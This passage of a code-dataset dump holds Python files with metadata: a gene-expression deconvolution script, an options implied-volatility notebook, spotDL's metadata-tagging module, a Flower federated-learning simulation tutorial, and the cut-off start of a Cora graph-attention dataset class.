4],\n [7, 4, 5, ..., 5, 8, 4],\n [6, 4, 4, ..., 4, 9, 5],\n ...,\n [7, 4, 4, ..., 4, 8, 4],\n [7, 4, 5, ..., 4, 9, 4],\n [8, 4, 4, ..., 4, 9, 4]])\n seed_topics : dict\n seed_topics: dict\n e.g.{0: [4,3],\n 1: [4],\n 2: [1],\n 3: [1,3,5],\n 4: [1],\n 5: [7]}\n seed_k : list\n [1,3,5,7,9,11,13]\n marker_final_dic : dcit\n {'B cells memory': ['AIM2', 'CR2', 'JCHAIN'],\n 'B cells naive': ['BCL7A', 'CD24', 'FCER2', 'IL4R', 'PAX5', 'TCL1A'],\n 'Monocytes': ['ALOX5AP','C5AR1','CCR2','CD14','CD163','CD274',...]}\n\n \"\"\"\n if self.marker_final_dic is None:\n raise ValueError('!! Final Marker Candidates were not defined !! 
--> run expression_processing()')\n # seed_topic preparation\n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values())))\n target = list(self.marker_final_dic.keys())\n seed_topic_list = [self.marker_final_dic.get(t) for t in target]\n seed_topics = {}\n finish_genes = []\n for t_id, st in enumerate(seed_topic_list):\n for gene in st:\n try:\n if gene in finish_genes:\n tmp = seed_topics[self.gene2id[gene]]\n seed_topics[self.gene2id[gene]] = tmp + [t_id]\n else:\n seed_topics[self.gene2id[gene]] = [t_id]\n finish_genes.append(gene)\n except:\n # not included in target expression table\n print(gene)\n pass\n \n # reliable gene\n genes = list(itertools.chain.from_iterable(list(self.marker_final_dic.values())))\n seed_k = []\n for g in genes:\n if self.gene2id.get(g) is None:\n #print(g)\n pass\n else:\n seed_k.append(self.gene2id.get(g))\n\n self.seed_topics = seed_topics\n seed_k = sorted(list(set(seed_k)))\n self.seed_k = seed_k\n \n if self.verbose:\n print(\"final genes:\",len(self.final_int))\n print('seed number:',len(self.seed_topics))\n print(\"seed_k:\",len(self.seed_k))\n\ndef main():\n raw_df = pd.read_csv('/mnt/AzumaDeconv/github/GLDADec/data/GSE65133/GSE65133_expression.csv',index_col=0)\n marker_dic = pd.read_pickle('/mnt/AzumaDeconv/github/GLDADec/data/domain_info/human_PBMC_CellMarker_8cell_raw_dic_v1.pkl')\n random_sets = pd.read_pickle('/mnt/AzumaDeconv/github/GLDADec/data/random_info/100_random_sets.pkl')\n\n SD = SetData()\n SD.set_expression(df=raw_df) \n SD.set_marker(marker_dic=marker_dic)\n SD.marker_info_processing(do_plot=True)\n SD.set_random(random_sets=random_sets)\n SD.expression_processing(random_n=0,specific=True)\n SD.seed_processing()\n \n # Collect data to be used in later analyses\n input_mat = SD.input_mat\n final_int = SD.final_int\n seed_topics = SD.seed_topics\n marker_final_dic = SD.marker_final_dic\n \n # save\n out_path = '/mnt/AzumaDeconv/github/GLDADec/Dev/test_data/'\n pd.to_pickle(final_int,out_path+'final_int.pkl')\n pd.to_pickle(seed_topics,out_path+'seed_topics.pkl')\n pd.to_pickle(marker_final_dic,out_path+'marker_final_dic.pkl')\n\nif __name__ == '__main__':\n main()", "repo_name": "mizuno-group/GLDADec", "sub_path": "run/dev1_set_data.py", "file_name": "dev1_set_data.py", "file_ext": "py", "file_size_in_byte": 12913, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 81, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 98, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 
116, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 161, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 161, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 163, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 166, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 169, "usage_type": "call"}, {"api_name": "gldadec.utils.freq_norm", "line_number": 181, "usage_type": "call"}, {"api_name": "gldadec.utils", "line_number": 181, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 212, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 213, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 213, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 214, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 221, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 222, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 231, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 231, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 234, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 273, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 273, "usage_type": "attribute"}, {"api_name": "itertools.chain.from_iterable", "line_number": 293, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 312, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 314, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 332, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.to_pickle", "line_number": 334, "usage_type": "call"}]} +{"seq_id": "71010364996", "text": "#%%\r\nfrom py_vollib.black_scholes import black_scholes as bs\r\nfrom py_vollib.black_scholes.greeks.analytical import vega\r\nfrom py_vollib.black_scholes.implied_volatility import implied_volatility\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\n# %%\r\ndef implied_vol(S0, K, T, r, market_price, flag='c', tol=0.00001):\r\n \"\"\"Calculating the implied volatility of an European option\r\n S0: stock price\r\n K: strike price\r\n T: time to maturity\r\n r: risk-free rate\r\n market_price: option price in market\r\n \"\"\"\r\n max_iter = 200 #max no. 
of iterations\r\n    vol_old = 0.3 #initial guess \r\n\r\n    for k in range(max_iter):\r\n        bs_price = bs(flag, S0, K, T, r, vol_old)\r\n        Cprime = vega(flag, S0, K, T, r, vol_old)*100\r\n        C = bs_price - market_price\r\n\r\n        vol_new = vol_old - C/Cprime\r\n        new_bs_price = bs(flag, S0, K, T, r, vol_new)\r\n        if (abs(vol_old-vol_new) < tol or abs(new_bs_price-market_price) < tol):\r\n            break\r\n\r\n        vol_old = vol_new\r\n\r\n    implied_vol = vol_new\r\n    return implied_vol, k  # also return the number of Newton iterations, used by the callers below\r\n#%%\r\nS0, K, t, r = 83.11, 80, 1/250, 0.025\r\nmarket_price = 3.23\r\niv, iter = implied_vol(S0, K, t, r, market_price)\r\nprint(\"The implied volatility {0:5.2f} was computed in {1:.0f} iterations\".format(iv*100, iter))\r\n\r\n# %%\r\nbs_over_iv = [ bs('c', S0, K, t, r, iv/100) for iv in range(0,100,1) ]\r\nplt.figure()\r\nplt.plot(bs_over_iv)\r\nplt.title('BS premium')\r\nplt.xlabel('Implied Volatility (%)')\r\nplt.ylabel('Call Price ($)')\r\nplt.show()\r\n\r\n#%%\r\ndef implied_vol2(S0, K, t, r, market_price, flag='c', exa=0.00001, vol_old=0.3, max_iter=200):\r\n    \"\"\"Calculating the implied volatility of a European option\r\n    S0: stock price\r\n    K: strike price\r\n    T: time to maturity\r\n    r: risk-free rate\r\n    market_price: option price in market\r\n    flag: c or p\r\n    exa: accuracy / error tolerance\r\n    vol_old: initial guess\r\n    max_iter: max no. of iterations\r\n    \"\"\"\r\n    err_vol = float('inf')\r\n    err_prc = float('inf')\r\n    iter = 0\r\n    bs_price = bs(flag, S0, K, t, r, vol_old)\r\n    while (err_vol > exa or err_prc > exa) and iter < max_iter:  # stop on convergence or once max_iter is reached\r\n        Cprime = vega(flag, S0, K, t, r, vol_old)*100\r\n        C = bs_price - market_price\r\n        vol_new = vol_old - C/Cprime\r\n        new_bs_price = bs(flag, S0, K, t, r, vol_new)\r\n        err_vol = abs(vol_old - vol_new)\r\n        err_prc = abs(new_bs_price - market_price)\r\n        vol_old = vol_new\r\n        bs_price = new_bs_price\r\n        iter += 1\r\n\r\n    implied_vol = vol_new\r\n    return implied_vol\r\n\r\nS0, K, t, r = 83.11, 80, 1/250, 0.025\r\nmarket_price = 5\r\n#iv, iter = implied_vol(S0, K, t, r, market_price)\r\n#print(\"The implied volatility {0:5.2f} was computed in {1:.0f} iterations\".format(iv*100, iter))\r\n\r\n#%%\r\n\r\ndata = pd.read_csv('C:/Users/nuno/OneDrive - ITESO/Ciencia de Datos'\r\n                   '/idi_ii/tsla_options_last.csv')\r\ndata.head()\r\ntest = data[10:11]\r\n# %%\r\nS = 1132\r\nr = 0.0025\r\n#%%\r\ntest['iv'] = test.apply(lambda row: implied_vol(S,\r\n                                                row['Strike'],\r\n                                                row['tau'],\r\n                                                r,\r\n                                                row['Last Sale'])[0], axis=1)  # [0]: implied_vol returns (vol, iterations)\r\n# %%\r\n\r\ntest['iv'] = test.apply(lambda row: implied_volatility(row['Last Sale'],\r\n                                                       S,\r\n                                                       row['Strike'],\r\n                                                       row['tau'],\r\n                                                       r,\r\n                                                       row['type']), axis=1)\r\n\r\n#%%\r\niv_vctr = [implied_volatility(row[2],\r\n                              S,\r\n                              row[7],\r\n                              row[8],\r\n                              r,\r\n                              row[9]) for row in test.itertuples()]  # positional indices assume the csv column order\r\n\r\n#%%\r\niv_vctr = []\r\nfor index, row in test.iterrows():\r\n    print(bs(row['type'], S, row['Strike'], row['tau'], r, 0))\r\n    print(row['Last Sale'])\r\n    if bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n        iv_vctr.append(implied_volatility(row['Last Sale'],S,row['Strike'],row['tau'],r,row['type']))\r\n    else:\r\n        iv_vctr.append(0)\r\n#%%\r\n\r\niv_vctr_be_rational = []\r\nfor index, row in data.iterrows():\r\n    if bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n        try:\r\n            iv_vctr_be_rational.append(implied_volatility(row['Last Sale'],S,row['Strike'],row['tau'],r,row['type']))\r\n        except:\r\n            iv_vctr_be_rational.append(0)\r\n    else:\r\n        iv_vctr_be_rational.append(0)\r\n\r\n#%%\r\niv_vctr_newton = []\r\nfor index, row in data.iterrows():\r\n    print(index)\r\n    try:\r\n        if 
bs(row['type'], S, row['Strike'], row['tau'], r, 0) < row['Last Sale']:\r\n try:\r\n iv_vctr_newton.append(implied_vol2(S,row['Strike'],row['tau'],r, row['Last Sale'], flag=row['type']))\r\n except:\r\n iv_vctr_newton.append(0)\r\n else:\r\n iv_vctr_newton.append(0)\r\n except:\r\n iv_vctr_newton.append(0)\r\n\r\n#%%\r\ndata['iv'] = iv_vctr_be_rational\r\n#%%\r\nsns.relplot(\r\n data=data[data.iv != 0], x='Strike', y='iv', hue='type', col='Expiration Date', kind='scatter', col_wrap=3\r\n).set(ylim=(0, 5))\r\n\r\n#%%\r\nimplied_volatility(587.5, S, 550, 0.0083, r, 'c')\r\nimplied_vol(S, 550, 0.0083, r, 587,)\r\n# %%\r\nbs('c', S,550, 0.0083, r,4)\r\n# %%\r\n", "repo_name": "daniel-nuno/IDI-II", "sub_path": "code/proyecto_iv_newton.py", "file_name": "proyecto_iv_newton.py", "file_ext": "py", "file_size_in_byte": 5545, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 21, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.greeks.analytical.vega", "line_number": 22, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 26, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 65, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.greeks.analytical.vega", "line_number": 67, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 87, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 102, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 110, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 120, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 122, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 123, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 130, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 132, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 143, "usage_type": "call"}, {"api_name": 
"seaborn.relplot", "line_number": 156, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.implied_volatility.implied_volatility", "line_number": 161, "usage_type": "call"}, {"api_name": "py_vollib.black_scholes.black_scholes", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "32305263443", "text": "\"\"\"\nSync Lyrics module for the console\n\"\"\"\n\nimport asyncio\nimport logging\nfrom pathlib import Path\nfrom typing import List\n\nfrom spotdl.download.downloader import Downloader\nfrom spotdl.types.song import Song\nfrom spotdl.utils.ffmpeg import FFMPEG_FORMATS\nfrom spotdl.utils.lrc import generate_lrc\nfrom spotdl.utils.metadata import embed_metadata, get_file_metadata\nfrom spotdl.utils.search import QueryError, get_search_results, reinit_song\n\n__all__ = [\"meta\"]\n\nlogger = logging.getLogger(__name__)\n\n\ndef meta(query: List[str], downloader: Downloader) -> None:\n \"\"\"\n This function applies metadata to the selected songs\n based on the file name.\n If song already has metadata, missing metadata is added\n\n ### Arguments\n - query: list of strings to search for.\n - downloader: Already initialized downloader instance.\n\n ### Notes\n - This function is multi-threaded.\n \"\"\"\n\n # Create a list of all songs from all paths in query\n paths: List[Path] = []\n for path in query:\n test_path = Path(path)\n if not test_path.exists():\n logger.error(\"Path does not exist: %s\", path)\n continue\n\n if test_path.is_dir():\n for out_format in FFMPEG_FORMATS:\n paths.extend(test_path.glob(f\"*.{out_format}\"))\n elif test_path.is_file():\n if test_path.suffix.split(\".\")[-1] not in FFMPEG_FORMATS:\n logger.error(\"File is not a supported audio format: %s\", path)\n continue\n\n paths.append(test_path)\n\n def process_file(file: Path):\n song_meta = get_file_metadata(file, downloader.settings[\"id3_separator\"])\n\n # Check if song has metadata\n # and if it has all the required fields\n # if it has all of these fields, we can assume that the metadata is correct\n if song_meta and not downloader.settings[\"force_update_metadata\"]:\n if (\n song_meta.get(\"artist\")\n and song_meta.get(\"artists\")\n and song_meta.get(\"name\")\n and song_meta.get(\"lyrics\")\n and song_meta.get(\"album_art\")\n ):\n logger.info(\"Song already has metadata: %s\", file.name)\n if downloader.settings[\"generate_lrc\"]:\n lrc_file = file.with_suffix(\".lrc\")\n if lrc_file.exists():\n logger.info(\"Lrc file already exists for %s\", file.name)\n return None\n\n song = Song.from_missing_data(\n name=song_meta[\"name\"],\n artists=song_meta[\"artists\"],\n artist=song_meta[\"artist\"],\n )\n\n generate_lrc(song, file)\n if lrc_file.exists():\n logger.info(\"Saved lrc file for %s\", song.display_name)\n else:\n logger.info(\"Could not find lrc file for %s\", song.display_name)\n\n return None\n\n # Same as above\n if (\n not song_meta\n or None\n in [\n song_meta.get(\"name\"),\n song_meta.get(\"album_art\"),\n song_meta.get(\"artist\"),\n song_meta.get(\"artists\"),\n song_meta.get(\"track_number\"),\n ]\n or downloader.settings[\"force_update_metadata\"]\n ):\n # Song does not have metadata, or it is missing some fields\n # or we are forcing update of metadata\n # so we search for it\n logger.debug(\"Searching metadata for %s\", file.name)\n search_results = get_search_results(file.stem)\n if not search_results:\n logger.error(\"Could not find metadata for %s\", file.name)\n return None\n\n song = search_results[0]\n else:\n # Song has metadata, so we use it to reinitialize the 
song object\n # and fill in the missing metadata\n try:\n song = reinit_song(Song.from_missing_data(**song_meta))\n except QueryError:\n logger.error(\"Could not find metadata for %s\", file.name)\n return None\n\n # Check if the song has lyric\n # if not use downloader to find lyrics\n if song_meta is None or song_meta.get(\"lyrics\") is None:\n logger.debug(\"Fetching lyrics for %s\", song.display_name)\n song.lyrics = downloader.search_lyrics(song)\n if song.lyrics:\n logger.info(\"Found lyrics for song: %s\", song.display_name)\n else:\n song.lyrics = song_meta.get(\"lyrics\")\n\n # Apply metadata to the song\n embed_metadata(file, song)\n\n logger.info(\"Applied metadata to %s\", file.name)\n\n if downloader.settings[\"generate_lrc\"]:\n lrc_file = file.with_suffix(\".lrc\")\n if lrc_file.exists():\n logger.info(\"Lrc file already exists for %s\", file.name)\n return None\n\n generate_lrc(song, file)\n if lrc_file.exists():\n logger.info(\"Saved lrc file for %s\", song.display_name)\n else:\n logger.info(\"Could not find lrc file for %s\", song.display_name)\n\n return None\n\n async def pool_worker(file_path: Path) -> None:\n async with downloader.semaphore:\n # The following function calls blocking code, which would block whole event loop.\n # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This\n # is not a problem, since GIL is released for the I/O operations, so it shouldn't\n # hurt performance.\n await downloader.loop.run_in_executor(None, process_file, file_path)\n\n tasks = [pool_worker(path) for path in paths]\n\n # call all task asynchronously, and wait until all are finished\n downloader.loop.run_until_complete(asyncio.gather(*tasks))\n", "repo_name": "spotDL/spotify-downloader", "sub_path": "spotdl/console/meta.py", "file_name": "meta.py", "file_ext": "py", "file_size_in_byte": 5995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13430, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "spotdl.download.downloader.Downloader", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 37, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 39, "usage_type": "call"}, {"api_name": "spotdl.utils.ffmpeg.FFMPEG_FORMATS", "line_number": 45, "usage_type": "name"}, {"api_name": "spotdl.utils.ffmpeg.FFMPEG_FORMATS", "line_number": 48, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 54, "usage_type": "name"}, {"api_name": "spotdl.utils.metadata.get_file_metadata", "line_number": 55, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song.from_missing_data", "line_number": 75, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song", "line_number": 75, "usage_type": "name"}, {"api_name": "spotdl.utils.lrc.generate_lrc", "line_number": 81, "usage_type": "call"}, {"api_name": "spotdl.utils.search.get_search_results", "line_number": 106, "usage_type": "call"}, {"api_name": "spotdl.utils.search.reinit_song", "line_number": 116, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song.from_missing_data", "line_number": 116, "usage_type": "call"}, {"api_name": "spotdl.types.song.Song", "line_number": 116, "usage_type": "name"}, {"api_name": "spotdl.utils.search.QueryError", "line_number": 117, "usage_type": "name"}, {"api_name": 
"spotdl.utils.metadata.embed_metadata", "line_number": 132, "usage_type": "call"}, {"api_name": "spotdl.utils.lrc.generate_lrc", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "7284529662", "text": "import pickle\nfrom pathlib import Path\n\nimport hydra\nfrom hydra.core.hydra_config import HydraConfig\nfrom omegaconf import DictConfig, OmegaConf\n\nimport flwr as fl\n\nfrom dataset import prepare_dataset\nfrom client import generate_client_fn\nfrom server import get_on_fit_config, get_evaluate_fn\n\n\n# A decorator for Hydra. This tells hydra to by default load the config in conf/base.yaml\n@hydra.main(config_path=\"conf\", config_name=\"base\", version_base=None)\ndef main(cfg: DictConfig):\n ## 1. Parse config & get experiment output dir\n print(OmegaConf.to_yaml(cfg))\n # Hydra automatically creates a directory for your experiments\n # by default it would be in /outputs//\n # you can retrieve the path to it as shown below. We'll use this path to\n # save the results of the simulation (see the last part of this main())\n save_path = HydraConfig.get().runtime.output_dir\n\n ## 2. Prepare your dataset\n # When simulating FL workloads we have a lot of freedom on how the FL clients behave,\n # what data they have, how much data, etc. This is not possible in real FL settings.\n # In simulation you'd often encounter two types of dataset:\n # * naturally partitioned, that come pre-partitioned by user id (e.g. FEMNIST,\n # Shakespeare, SpeechCommands) and as a result these dataset have a fixed number\n # of clients and a fixed amount/distribution of data for each client.\n # * and others that are not partitioned in any way but are very popular in ML\n # (e.g. MNIST, CIFAR-10/100). We can _synthetically_ partition these datasets\n # into an arbitrary number of partitions and assign one to a different client.\n # Synthetically partitioned dataset allow for simulating different data distribution\n # scenarios to tests your ideas. The down side is that these might not reflect well\n # the type of distributions encounter in the Wild.\n #\n # In this tutorial we are going to partition the MNIST dataset into 100 clients (the default\n # in our config -- but you can change this!) following a independent and identically distributed (IID)\n # sampling mechanism. This is arguably the simples way of partitioning data but it's a good fit\n # for this introductory tutorial.\n trainloaders, validationloaders, testloader = prepare_dataset(\n cfg.num_clients, cfg.batch_size\n )\n\n ## 3. Define your clients\n # Unlike in standard FL (e.g. see the quickstart-pytorch or quickstart-tensorflow examples in the Flower repo),\n # in simulation we don't want to manually launch clients. We delegate that to the VirtualClientEngine.\n # What we need to provide to start_simulation() with is a function that can be called at any point in time to\n # create a client. This is what the line below exactly returns.\n client_fn = generate_client_fn(trainloaders, validationloaders, cfg.num_classes)\n\n ## 4. Define your strategy\n # A flower strategy orchestrates your FL pipeline. Although it is present in all stages of the FL process\n # each strategy often differs from others depending on how the model _aggregation_ is performed. This happens\n # in the strategy's `aggregate_fit()` method. 
In this tutorial we choose FedAvg, which simply takes the average\n # of the models received from the clients that participated in a FL round doing fit().\n # You can implement a custom strategy to have full control on all aspects including: how the clients are sampled,\n # how updated models from the clients are aggregated, how the model is evaluated on the server, etc\n # To control how many clients are sampled, strategies often use a combination of two parameters `fraction_{}` and `min_{}_clients`\n # where `{}` can be either `fit` or `evaluate`, depending on the FL stage. The final number of clients sampled is given by the formula\n # ``` # an equivalent bit of code is used by the strategies' num_fit_clients() and num_evaluate_clients() built-in methods.\n # num_clients = int(num_available_clients * self.fraction_fit)\n # clients_to_do_fit = max(num_clients, self.min_fit_clients)\n # ```\n strategy = fl.server.strategy.FedAvg(\n fraction_fit=0.0, # in simulation, since all clients are available at all times, we can just use `min_fit_clients` to control exactly how many clients we want to involve during fit\n min_fit_clients=cfg.num_clients_per_round_fit, # number of clients to sample for fit()\n fraction_evaluate=0.0, # similar to fraction_fit, we don't need to use this argument.\n min_evaluate_clients=cfg.num_clients_per_round_eval, # number of clients to sample for evaluate()\n min_available_clients=cfg.num_clients, # total clients in the simulation\n on_fit_config_fn=get_on_fit_config(\n cfg.config_fit\n ), # a function to execute to obtain the configuration to send to the clients during fit()\n evaluate_fn=get_evaluate_fn(cfg.num_classes, testloader),\n ) # a function to run on the server side to evaluate the global model.\n\n ## 5. Start Simulation\n # With the dataset partitioned, the client function and the strategy ready, we can now launch the simulation!\n history = fl.simulation.start_simulation(\n client_fn=client_fn, # a function that spawns a particular client\n num_clients=cfg.num_clients, # total number of clients\n config=fl.server.ServerConfig(\n num_rounds=cfg.num_rounds\n ), # minimal config for the server loop telling the number of rounds in FL\n strategy=strategy, # our strategy of choice\n client_resources={\n \"num_cpus\": 2,\n \"num_gpus\": 0.0,\n }, # (optional) controls the degree of parallelism of your simulation.\n # Lower resources per client allow for more clients to run concurrently\n # (but need to be set taking into account the compute/memory footprint of your workload)\n # `num_cpus` is an absolute number (integer) indicating the number of threads a client should be allocated\n # `num_gpus` is a ratio indicating the portion of gpu memory that a client needs.\n )\n\n # ^ Following the above comment about `client_resources`. if you set `num_gpus` to 0.5 and you have one GPU in your system,\n # then your simulation would run 2 clients concurrently. If in your round you have more than 2 clients, then clients will wait\n # until resources are available from them. This scheduling is done under-the-hood for you so you don't have to worry about it.\n # What is really important is that you set your `num_gpus` value correctly for the task your clients do. For example, if you are training\n # a large model, then you'll likely see `nvidia-smi` reporting a large memory usage of you clients. In those settings, you might need to\n # leave `num_gpus` as a high value (0.5 or even 1.0). 
For smaller models, like the one in this tutorial, your GPU would likely be capable\n # of running at least 2 or more (depending on your GPU model.)\n # Please note that GPU memory is only one dimension to consider when optimising your simulation. Other aspects such as compute footprint\n # and I/O to the filesystem or data preprocessing might affect your simulation (and tweaking `num_gpus` would not translate into speedups)\n # Finally, please note that these gpu limits are not enforced, meaning that a client can still go beyond the limit initially assigned, if\n # this happens, your might get some out-of-memory (OOM) errors.\n\n ## 6. Save your results\n # (This is one way of saving results, others are of course valid :) )\n # Now that the simulation is completed, we could save the results into the directory\n # that Hydra created automatically at the beginning of the experiment.\n results_path = Path(save_path) / \"results.pkl\"\n\n # add the history returned by the strategy into a standard Python dictionary\n # you can add more content if you wish (note that in the directory created by\n # Hydra, you'll already have the config used as well as the log)\n results = {\"history\": history, \"anythingelse\": \"here\"}\n\n # save the results as a python pickle\n with open(str(results_path), \"wb\") as h:\n pickle.dump(results, h, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "adap/flower", "sub_path": "examples/flower-simulation-step-by-step-pytorch/Part-I/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "omegaconf.DictConfig", "line_number": 17, "usage_type": "name"}, {"api_name": "omegaconf.OmegaConf.to_yaml", "line_number": 19, "usage_type": "call"}, {"api_name": "omegaconf.OmegaConf", "line_number": 19, "usage_type": "name"}, {"api_name": "hydra.core.hydra_config.HydraConfig.get", "line_number": 24, "usage_type": "call"}, {"api_name": "hydra.core.hydra_config.HydraConfig", "line_number": 24, "usage_type": "name"}, {"api_name": "dataset.prepare_dataset", "line_number": 44, "usage_type": "call"}, {"api_name": "client.generate_client_fn", "line_number": 53, "usage_type": "call"}, {"api_name": "flwr.server.strategy.FedAvg", "line_number": 68, "usage_type": "call"}, {"api_name": "flwr.server", "line_number": 68, "usage_type": "attribute"}, {"api_name": "server.get_on_fit_config", "line_number": 74, "usage_type": "call"}, {"api_name": "server.get_evaluate_fn", "line_number": 77, "usage_type": "call"}, {"api_name": "flwr.simulation.start_simulation", "line_number": 82, "usage_type": "call"}, {"api_name": "flwr.simulation", "line_number": 82, "usage_type": "attribute"}, {"api_name": "flwr.server.ServerConfig", "line_number": 85, "usage_type": "call"}, {"api_name": "flwr.server", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 124, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 124, "usage_type": "attribute"}, {"api_name": "hydra.main", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "70576710275", "text": "from typing import Dict\n\nimport os\nimport numpy as np\nimport torch\nfrom torch import nn\nimport urllib.request\nimport tarfile\n\nfrom ml_foundations.models.deep_models.layers import GraphAttentionLayer\n\n\nclass CoraDataset:\n 
